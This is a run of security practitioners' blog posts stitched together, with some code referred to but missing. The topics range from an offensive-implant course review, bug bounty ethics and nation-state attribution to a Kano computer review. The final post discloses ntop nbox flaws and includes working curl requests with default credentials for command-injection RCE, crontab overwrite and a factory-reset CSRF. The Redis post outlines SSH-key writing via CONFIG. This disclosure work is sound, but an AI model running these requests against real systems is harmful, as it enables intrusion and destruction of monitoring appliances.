I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-) I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development. The class material are getting slightly dated in some cases. A refresh might be helpful. More Throwback usage & development would be fun (even as optional labs).

Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.

Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or just for people doing response.

Lab 5 whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms: I think the set of courses are having a bit of an identity crisis mostly due to the 2 dayformat and would be a much better class as a 5 day. It is heavy development focused meaning youspend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitelysuffers a bit due to all the dev time. There was minimal talk around lateral movement and the wholething is entirely Windows focused so no Linux and no OSX. A suggestion to fix the “ops” piecewould be to have a Dark Side Ops - Dev and Dark Side Ops - Operator courses where the dev oneis solely deving your implant and the Operator course would be solely using the implant you dev’d(or was provided to you). The Silent Break team definitely knows their stuff and a longer classformat or switch up would allow them to showcase that more efficiently.

A good friend/co-worker recently turned 30. In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life.

I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had know or read earlier in life.

I'll split the post into two parts; computer books and life/metaphysical books.

Computer books

This is by no means an exhaustive list. A more exhaustive list can be found here (recently updated).

He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him. There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.

The Phoenix Project is absolutely one of the best tech books I've read in the last few years. Working for Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings when you can do infrastructure as code, micro services, and the flexibility DevOps can bring to prototyping and developing code and projects. There is also the "security guy" in the story that serves as the guy we never want to be but sometimes end up being unbeknownst to us.

The running joke is that Zero to One is in the Hipster starter kit but I thought it was a great book. The quick summary is that Peter Thiel describes businesses that iterate on a known problem and can be successful and there are businesses that create solutions to problems we didn't know we had. Examples of the latter being companies like Google, Facebook, PayPal, Uber. It's a short book and should be required reading for anyone thinking of starting a business.

The following is life stuff, so if all you care about is tech shit, feel free to eject at this point.

still here?

Metaphysics

1st, Many Lives Many Masters by Brian Weiss A nice gentle introduction into the idea that we reincarnate and our eternal souls. Written by a psychiatrist who more or less stumbled into the fact that people have past lives while doing normal psychiatry work.

From Amazon:"As a traditional psychotherapist, Dr. Brian Weiss was astonished and skeptical when one of his patients began recalling past-life traumas that seemed to hold the key to her recurring nightmares and anxiety attacks. His skepticism was eroded, however, when she began to channel messages from the “space between lives,” which contained remarkable revelations about Dr. Weiss’ family and his dead son. Using past-life therapy, he was able to cure the patient and embark on a new, more meaningful phase of his own career."

2nd, A New Earth by Eckert Tolle This is the best book i read in 2016 and I've been sharing it with everyone I can. Everyone in infosec should read this book to understand the way the ego works in our day to day lives.

From Amazon:In A New Earth, Tolle expands on these powerful ideas to show how transcending our ego-based state of consciousness is not only essential to personal happiness, but also the key to ending conflict and suffering throughout the world. Tolle describes how our attachment to the ego creates the dysfunction that leads to anger, jealousy, and unhappiness, and shows readers how to awaken to a new state of consciousness and follow the path to a truly fulfilling existence.

3rd, Self Observation by Red Hawk. The practical application guide if you got something from A New Earth. An instruction manual around self-observation.

From Amazon:"This book is an in-depth examination of the much needed process of 'self'-study known as self observation. We live in an age where the "attention function" in the brain has been badly damaged by TV and computers - up to 90 percent of the public under age 35 suffers from attention-deficit disorder! This book offers the most direct, non-pharmaceutical means of healing attention dysfunction. The methods presented here are capable of restoring attention to a fully functional and powerful tool for success in life and relationships. This is also an age when humanity has lost its connection with conscience. When humanity has poisoned the Earth's atmosphere, water, air and soil, when cancer is in epidemic proportions and is mainly an environmental illness, the author asks: What is the root cause? And he boldly answers: failure to develop conscience! Self-observation, he asserts, is the most ancient, scientific, and proven means to develop this crucial inner guide to awakening and a moral life. This book is for the lay-reader, both the beginner and the advanced student of self observation. No other book on the market examines this practice in such detail. There are hundreds of books on self-help and meditation, but almost none on self-study via self observation, and none with the depth of analysis, wealth of explication, and richness of experience which this book offers."

In my mind, the key to success and blogging is to be totally selfish in its planning and execution.Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about a more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog (but really more notes/cheat-sheet think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes. When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again. Having notes to go back to saves time and stress. It also allows me to help people on my team in the event they run into it while I am on a different project.How/Platforms: I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit and some jerk person decided to make an example of the blog's lack of updates publicly at BlackHat (appreciate the heads up...#totallynotbitter). With Blogger, hosted WordPress, or some other hosted platform I'm offloading the risk and I don't have to worry about keeping up with patches. Consistently posting. No idea. It's clear I have lost the ability to consistently post. I do sometimes queue up a bunch of posts and schedule their posting. I've found it was easier to find things to blog about when I was consulting since I had a different client every week so it would be difficult to tie a vulnerability back to any particular client. Now that I work for a company, if I'm talking about some vulnerability or exploit I used there is a good chance I used it for work; potentially exposing the company to risk.

Length. No one reads long posts. Break long posts into separate logical posts even if you choose to post them at the same time.

I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment. I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.

Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something? If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level? mom and pop maybe not, VC funded startup? 30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough or have we evolved as a society where basically everything deserves some sort of monetary reward. After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes] Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomeware'd or their EC2 infra shut down/turned off/deleted codespaces style am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty signifiant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably wont get $$ make me a "bad person"? numbers 1-3 come into play here for sure

My last two jobs, I've worked for companies that had Bug Bounty programs so my opinion on the above is DEFINITELY shaped by working for companies that get it understand and care about their security posture and do feel that reporting security issues by outside researchers has monetary value. An added benefit to have a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.

Thoughts/comments VERY welcome on this one. Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route. I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.

I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes...listening for UDP packets) it was receiving no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP but not the spoofed IP.

So I asked on Twitter...fucking mistake...after getting past the trolls and well intentioned people that didn't think I understood basic networking/spoofing at all (heart u) link #1, link #2 as the likely reason I couldn't spoof the IP. As well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found https://spoofer.caida.org/recent_tests.php which allows you to check and see if a particular ASN supports spoofing along with the stats that only 20% of the Internet allows spoofing.

Checking common ISP and cloud provider ASNs showed that most weren't vulnerable to spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.

P.S.Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host but to satisfy my curiosity on the issue I built a vulnerable NTP server and it did NOT receive the traffic even with hosts from the same VPS provider in the same data center (different subnets).

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceed to be a drunk dbag to him. It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the army how I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual. Shit, If someone has all this shit on their chest they must be badass right??!!For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life. So the first few people I met that had these badges reaffirmed this belief. Then I got out and met a few more and was completely let down at the quality of these people. When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career your entire career. So maybe as some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge means they are good at or even a good person. It means at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that 10 years later are still riding the vapor trails of some awesome shit they did but havent done anything else relevant since. Some people have giant egos that only care about you if you are currently in the process of kissing their ass. To be fair if people ARE kissing your ass its hard not get an ego but you have to work hard to check that shit at the door.

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."from: http://hadoop.apache.org/

Although occasionally you'll find one that will just let you pick your own :-)If you gain access, full HDFS access, run queries, etc

HDFS WebUIHDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.

I wanted to be able to boot the Kano OS in a virtual machine so i could play hack minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a raspberry pi into an monitor to use and wanted to use it on my local laptop.

If you follow the steps on that page with regards to mounting the image and editing /etc/ld.so.preload and /etc/fstab I was able to get the image to boot up successfully...slow as hell...but it technically was working.

I was so horribly slow i don't think this is feasible. I am going to try using libvirt to make it better or just see if i can play hack minecraft another way. If I get anywhere further with the project i'll post an update.

Favorite talksBridging the gap between ICS(IoT?) and corporate IT securityStefan Lüders

I really enjoyed this talk hearing how an organization defends in a BYOD & academic environment. Defense is difficult when you control the hosts, even more so when you you cant instrument the host and have to rely on network controls only.

WTF is it?The kano computer is a raspberry pi based computer that is meant for kids to put together and build themselves. Looks a bit like this:propaganda video:

It ships with a nice guide that most kids will be able to follow to get the piece of the Kano computer up and running. Optionally you can also buy a screen kit where everything can fit all together in a tidy package. The screen kit that houses the raspberry pi and and keyboard is the reason I went with the Kano over just piecing one together for the kids.

Once you get the hardware set up, the KanoOS walks you thru setting up a user account and starts off in story mode where you start off on SD beach and get to explore your computer in a RPG type environment.

You also have menu for kids where they can pick what they want to work on but also has a classic button if you want to get to a more normal Linux experience.

Not shown in the screenshot but definitely present in the menu now is a link to Scratch which this kids love. And of course no computer for kids cant not ship without Minecraft:

This week's "Secrets of the Computer Kit" included an introduction to the Linux terminal and cowsay!

cowsay, with some Scratch on the other Kano

The kids also got their first real Linux experience by the screen flipping and it still being flipped after a reboot. We eventually found an option in the menu to flip it back but it was a nice introduction to the hell that is running Linux...good times. Enjoy Linux hell boys I'll be here to help you Overall extremely pleased. Two negative experiences though:One was the first upgrade process. It took over 30 minutes to download all the updates. I ended up losing the kids for the nite during that process due to it taking so long. Second was the fact the computers showed up one day and the monitors the next!? WTF. I realize Kano doesn't have control of all things shipping but it was a real PITA to have computers and no monitors. Suggestion: bundle kits should ship together.Aside from the above, the kids have been enjoying their new computers.

“However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”

He goes on to show how someone could echo over SSH keys and use the config command to write them to the appropriate place if you have permissions. He used a key name of "crackit" so I thought I'd see how prevalent it was....I checked a few and saw it a good chunk of them.

go go shodan

I did find something interesting while looking thru some open redis boxes. I found:

A cron job? running a shell script. Can you do that from Redis???

What's in the shell script?!

alt coin mining! sweeeeeet.

I had no idea what an XMR is but I wanted to see how this person was doing with the money making. Thankfully you can just query the payouts for any XMR address. So I did:

They've made around $20,000 USD in BTC. I guess crime does pay :-)

To satisfy my curiosity started a miner up on a linode and was getting around 60 H/s. This person is cranking out 70 KH/s, so they have a few boxes working for them.

Back in the day, you could download a piece of software, reverse engineer / fuzz it, find bugs, notify the vendor, post on Full Disclosure, watch a patch come out, and move on to the next bug.

These days systems have become very complex. A system might include:

A HID (Touch screen, keyboard, other devices)

Data Inputs (USB key, Bluetooth, Wireless, Satellite, Cell)

Firmware (BIOS or other embedded aspects)

OS

Applications (both OEM and 3rd party)

Media Servers

Other control systems

Telematics interfaces

This collection of components may be very expensive, on the order of 250k in some cases, or say 10-20k for a car. These components may be made by multiple different vendors, all with NDA's and MSA's between them.

This whole system is then certified and tested by numerous bodies such as FAA, TSA, NHTSA, NAFTA OEMs, Avionics Manufacturers such as Boeing and Airbus, Airlines, etc. There may be regulations and requirements around patch cycle timing, disclosure, and legal.

How in this context, can these systems be tested for security issues in a reliable and effective manner? Right now there are several ways this testing occurs:

1.) Via Testing Contracts.

The vendor puts out a bid or otherwise engages a 3rd party security company to test the system. NDAs and MSAs are exchanged, access to the system is provided, testing performed, and results delivered. Fixes are developed and pushed out according to the schedule and requirements agreed upon by all the organizations outlined above.

PROS

Vendor has a level of protection that their reputation won't be tarnished via media disclosures, their IP stolen, etc. Vendor has some assurance the testers are competent and there is a level of service expected.

CONS

This process is not public and people outside this framework have little to no insight into what is going on, how testing is done (or if), who is doing it, what fixes have been put in place. etc. This also limits the number of bright people who can see and test the system, almost ensuring that some bugs will be missed.

2.) Bug Bounties.

Vendors make some aspect of the system available publicly for anyone to test and pays a bounty for valid vulnerabilities discovered. In some special cases the vendor may make an entire system accessible for a limited amount of time. (Time limited to offset the cost of the system)

PROS

Process is public and many eyes are on the product. Raises the exposure of the product to new testers and approaches. Builds a level of trust in the vendor and assurance that the vendor "cares about security".

CONS

Costs the vendor time and effort and often produces little more than noise, or bugs already known about through internal testing. (I'm basing this on my personal discussions with vendors in the real world). Testing quality is often very low. Often the holistic system cannot be tested in this way, only components.

3.) Rogue Testing.

This is sort of where I came up in the industry initially before moving more into 1.) above. The way this works is that a researcher (or team of researchers) and/or a security company gain access to a system in some way. Examples include buying a piece of the system on eBay or in the case of publicly available systems such as avionics, testing it live. A car could be bought as well. This is sort of a black box approach as access to all the back end systems, telematics, source, .etc. will not be available.

PROS

A researcher can sort of do whatever they want without constraints. A security company can leverage this for media attention (marking / sales), and it drums up interest for conference talks. Real bugs are found this way and the vendor is technically notified, either as a heads up by the finder or via the media.

CONS

No trust is developed between the vendor and the bug finder. In fact the relationship is almost always adversarial by its nature. The public receives an unclear picture of the true threat. Do they trust the finder who is often over hyping to get attention or do they trust the vendor who has a material interest in under hyping and disproving the bug.

I'm sure I am missing other pros and cons to each of these, so please feel free to send me ideas. I'm also sure there are other approaches to testing which is why I am making this post. Here are some questions to consider:

Are complex systems such as avionics and automotive substantially the same from a testing perspective as windows hosts or endpoint software?

Is live testing on a passenger vehicle really the right way to do security testing?

Should only professional security companies with contracts in hand be allowed to test?

Are bug bounties in their current incarnation really effective for these types of systems?

My answer to the above questions is probably no.

I propose that we, the security community, collectively try to come up with a better way or framework for doing this. Any ideals will be appreciated and considered. Are you already doing something in this arena that is better than what I have outlined? Is there something you thought would work but have not gotten traction on it?

I'd love to hear from vendors, sec companies, and researchers alike.

I also propose that unethical behavior in our industry be called out. Every time a company brushes up against extortion, over hypes a bug, or claims credit for non-employee's work, just for short term sales, it damages the credibility of all of us and makes our jobs harder. Lets require the best of ourselves. Security has become huge, and is about to become bigger. Over the last year think how many times hacking has been in main stream media. Now contrast that with 10 years ago. This is an industry that is about to explode. Do we really want to be found wanting when the world finally is ready to take us seriously?

Thomas Ptacek made an interesting tweet today about Nation States, and if the term has any meaning, which got me thinking. In light of the numerous breaches that have been occurring, affecting both commerce, government, and potentially even elections, I decided to take some time to write down my thoughts on some of the subjects that come up when these events occur.

First lets talk about victim psychology. When a person or an organization is hacked, they go through similar emotions to victims of any crime. There is shame and guilt, anger, a desire to "do something about it" and to make sure "this can never happen again".

There is also a feeling of need to justify why the breach occurred; "How could this have happened?". Also important to take into consideration is the mindset of investigators. They like catching the bad guy, uncovering the mystery, beating the attacker at their own game. However, its not exciting to investigate or report on a dumb or simple attacker, who did nothing exceptional. Because of this, people are highly incentivized to look for indicators or confirmation that the attacker was some how exceptional. This makes it more ok that they lost and were compromised and it makes investigator's jobs more exciting. (I know, I've been there.)

Lets talk about a word that gets thrown around a lot by media, government, and intrusion investigators: Sophisticated. This term seems to imply a sort of evil genius, someone who did such outlandishly amazing feats of hacking that there is no way your average organization could have stopped or detected them.

"We got broken into!""How could this have happened? Didn't you do your job? Didn't we spend all that money on defenses?""Well they were VERY sophisticated""Oh well ok then, nothing we could have done"

This is both true and not true. Defenders really have little hope of keeping attackers out (sophisticated or not), even if they do most everything right. Worse, what it takes to do everything "right" is very expensive, the talent to do so is scarce and hard to find, and the technology involved changes rapidly. In actuality, most breaches aren't really that sophisticated, depending on how you define the term.

In the interest of giving you background let me say I've personally investigated a large number of breaches, and my team even more. I've conducted an even larger number of attacks myself for the purposes of security, even some I would label as sophisticated, so I've worked on both sides of the issue. We have seen breaches which have been verified government attacks (verified by direct human means among a number of other things, giving me high confidence, not just by an IP address or a foreign word in code), organized crime, talented blackhats, vandalizing kids, corporate competitors, and malicious insiders. In all of these investigations, very few did anything that I would personally classify as sophisticated.

Its probably time to define what I mean when I say sophisticated. To me an attack requires a number of elements in order to be considered sophisticated:

Is targeted rather than opportunistic. This means someone set out with intent to attack the organization rather than stumbling across a random vulnerability they could take advantage of while looking for anything random to break in to.

Is planed. This means someone didn't just say "Let me throw a bunch of attacks at this organization I don't like", but rather put together a plan for getting in, staying in, targeting data or capabilities, getting information out, and hiding their identify. There are clues during an investigation that help you see the difference between a planned attack and a haphazard one.

Uses unique technology or technology in a unique way. Unless there is an intentional deception going on, sophisticated attacks don't use off the shelf hacker / auditor tools. They typically use high quality (reliable) custom tools, or tools available as a part of operating systems in unusual or unintended ways.

Involves malware that obviously took a team to write. There are very talented individuals who can write custom tools, but most often sophisticated tools are written by teams of specialists who break up and take on different features or capabilities of the tool. If you are looking at code, you can often tell this.

May involve anti-analysis or anti-investigation techniques, or target investigators directly.

Long term persistence. Random hackers usually want to get in and get out. Sophisticated hackers have more confidence in their tools and abilities, have more resources, and tend to stay a while to extract all the value from the compromise they can.

You may not agree with all of my criteria, but hopefully we can agree on the fact that there must be SOME criteria for classifying an attack as sophisticated. I should note that I have seen sophisticated attacks violate any number of the above requirements. Individually none of them certify that an attack is sophisticated, but if taken all together or in majority, they typically do.

Now lets tackle this term "Nation State". As it turns out, this is much trickier than you might suppose. In the context of computer attacks, most people might define this as an attack carried out purposefully by a government against an organization, individual, or other government. People like very clean, clear cut, black and white definitions so that we know who the bad guy is and who the good guy is. Unfortunately the world doesn't work so simply. I would like to propose that a Nation State attack could be one which incorporates any of the following:

A highly talented individual hacker, hacking mostly alone. This person may be monitored by a government, either passively or actively, who benefit from their non-directed actions.

A private, non-government employed, hacker group, whose activities get co-opted by a government.

Defense contractors and other private business who supply tools and talent, knowingly or unknowingly, to a government and it's interests.

Military staff whose purpose is typically more one of disruptive capability, but may collaborate with any of these other groups.

Civilian government staff, comprised of intelligence professionals and others, who leverage cyber attacks for intelligence purposes.

Any of the above who are acting for other purposes, such as personal financial benefit, not under the direction of a government, but perhaps using government tools and resources.

In light of the above, an attack may use known Nation State tools, but could be carried out by someone who either captured or stole these tools, or is using them on the side, without permission, for personal gain. Imagine, for example, a country where you don't have to be a government or military employee to hack for the government. You are given access to the best tools and training, covert networks, and target lists. You see a lot, you know where money and secrets lie. Then government polices change and your services are no longer needed, or are less needed. Maybe you took copies of the tools home. Maybe you still have accounts or access to jump stations and command and control servers. It might be tempting to leverage this to make a little money on the side. Many investigators will see the IPs you are coming from, the tools you are using, your language preferences, and make the Nation State determination, even though this is clearly not the case. I would venture to say that unless you have the following, attribution is shaky at best:

Initial entry vector

Copies of the tools used and high end reverse engineering capabilities

Full packet capture and netflow of the attack

Comprehensive logs

Forensic images of compromised hosts

Threat Intelligence sharing across multiple organizations or even countries

Human intelligence (ex. confessions from the attacker, group infiltrators and spies, people assets in law enforcement or other investigatory organizations)

Hack back. Access to attacker systems and infrastructure, or even national network infrastructure in order to monitor the actual sources of attacks.

Now for most private companies, the above is fantastically too expensive to maintain, the talent too scarce, and national laws too unfriendly, and from a business standpoint it doesn't make sense to bother. There are of course exceptions, and multiple companies working in an industry and cooperating with government or law enforcement might get close.

It is also important to say that Sophisticated attacks aren't necessarily Nation States, and Nation State attacks aren't necessarily Sophisticated. Let me give some examples.

I know the story of an individual, who when they were around 14 years old, researched and developed a suite of what I could call sophisticated tools, including hardware firmware persistence, air-gap jumping, and ex-filtrated data analytics. This person then extensively planned out an attack against a government in a country other than their own, and conducted it over the course of around a year. They did this primarily for the intellectual pursuit, and to gain access to specific technologies to help them in further attacks down the road. This attack was eventually discovered, and classified as a Sophisticated Nation State attack by the investigators, when in fact it was a talented kid, acting alone.

I have personally investigated attacks verified to be directed, executed, and managed by a foreign government, which used straight up off the shelf and publicly available hacker tools, in very obvious and even clumsy ways. The attack was successful, but was caught and stopped pretty quickly and was only determined to be Nation State because an outside organization had proof obtained by other investigatory means.

I have also seen (and performed) attacks where a couple of US based blackhats will create or purchase a 0day, modify it, build a suite of custom tools developed with foreign language packs, anonymously purchase or compromise hosts in a foreign country, and conduct a campaign against an organization in the US which has all the hallmarks of being a Sophisticated Nation State attack. But it was actually just us performing an attack simulation for a client, or a group of non-government affiliated blackhats using deception to hide who they are.

A sophisticated attack can be an expensive one (although in the case of the 14 year old maybe not so much). High end attack tools, 0day, etc. are very valuable and take time to produce. You don't want to burn these tools for no reason. This means there is incentive to use the least sophisticated and cheapest means to accomplish the following goals:

In many cases, the detection aspects in the list above don't matter, even for nation states. Sometimes if you can get in and get what you need with little to no repercussions, you don't care if you are detected a month later.

If you think about it this way, then the ideal situation might be to watch while a non-affiliated 3rd party performs the attack, using their own tools, and you simply reap the access or data rewards without getting your hands dirty.

The goal of this post was to point out that when you hear the terms Nation State or Sophisticated attack thrown around by the media, or companies who sell investigation / threat intelligence services and tools, you might hesitate before taking it at face value. I'm not saying these organizations are being intentionally or maliciously misleading, just that their criteria for making those statements may be too lose and ill defined.

This can be tedious if you want to spin down an instance with tons of workspaces on it. So I wrote a quick resource script to get it done. This takes a list of workspaces. I'm sure you can programmatically retrieve the workspaces but I didn't. Code below:

Security is a boomin’, and so there are many different appliances to protect your network. Some of them do very little to protect, some of them open new holes in yournetwork.

In line with best practice, many Security teams capture all network traffic using a variety of solutions, some closed, some open source. Once the traffic is stored, it can be used to detect badness, or just examine traffic patterns on corporate assets.

One of these open source options is NTOP, which of course has an appliance version, called nbox recorder. It goes without saying, if this traffic data were to be exposed, the consequences could be catastrophic. Consider stored credentials, authentication data, PII, internal data leakage...

PCAP or it didn't happen

You can either buy a ready-to-go appliance or with some drudge work you can build your own. Just get a license for nbox and just put it into a Linux box, they are nice like that providing all the repositories and the steps are simple and easy to follow. Just spin up an Ubuntu VM and run:

BOOM! You are ready to go. Now you have a nbox recorder ready to be used. And abused!The default credentials are nbox/nbox and it does use Basic Auth to be accessed.

Before I continue, imagine that you have this machine capturing all the traffic of your network. Listening to all your corporate communications or production traffic and storing them on disk. How bad would it be if an attacker gets full access to it? Take a minute to think about it.

Uh-oh...

This level of exposure caught my eye, and I wanted to verify that having one of these sitting in your network does not make you more exposed. Unfortunately, I found several issues that could have been catastrophic with a malicious intent.

I do believe in the responsible disclosure process, however after repeatedly notifying both ntop and MITRE, these issues were not given high priority nor visibility. The following table details the timeline around my disclosure communications:

Disclosure Timeline

12/27/2014 - Sent to ntop details about some nbox vulnerabilities discovered in version 2.001/15/2015 - Asked ntop for an update about the vulnerabilities sent01/16/2015 - Requested by ntop the details again, stating they may have been fixed01/18/2015 - Sent for a second time the vulnerabilities details. Mentioned to request CVEs05/24/2015 - Asked ntop for an update about the vulnerabilities sent and to request CVEs01/06/2016 - Noticed new nbox version is out (2.3) and found more vulnerabilities. Old vulnerabilities are fixed. Sent ntop an email about new issues and to request CVEs01/06/2016 - Quick answer ignoring my request for CVEs and just asking for vulnerabilities details.01/28/2016 - Sent request for CVEs to MITRE, submitting a full report with all the issues and steps to reproduce.02/17/2016 - Asked MITRE for an update on the issues submitted.02/17/2016 - Reply from MITRE: “Your request is outside the scope of CVE's published priorities. As such, it will not be assigned a CVE-ID by MITRE or another CVE CNA at this time.”

07/10/2016 - Noticed new nbox version (2.5) with partial fixes for some vulnerabilities in the previous (2.3) version

The ntop team initially refused to comment and silently fixed the bugs. MITRE then said this wasn't severe enough to warrant a CVE. As such, I have now chosen to highlight the issues here in an effort to have them remediated. I again want to highlight that I take this process very seriously, but after consulting with multiple other individuals, I feel that both the ntop team and MITRE have left me no other responsible options.

Here comes the paintrain!

*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:

RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRONcurl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'The last one is a CSRF that leaves the machine fried, by resetting the machine completely:GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgicurl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'

To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)https://github.com/javuto/nbox-pwnage

And you can run the checker.sh to check for all the above attacks. Pull requests are welcome if you find more!

(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...If you have any questions or feedback, hit me up in twitter (@javutin)!

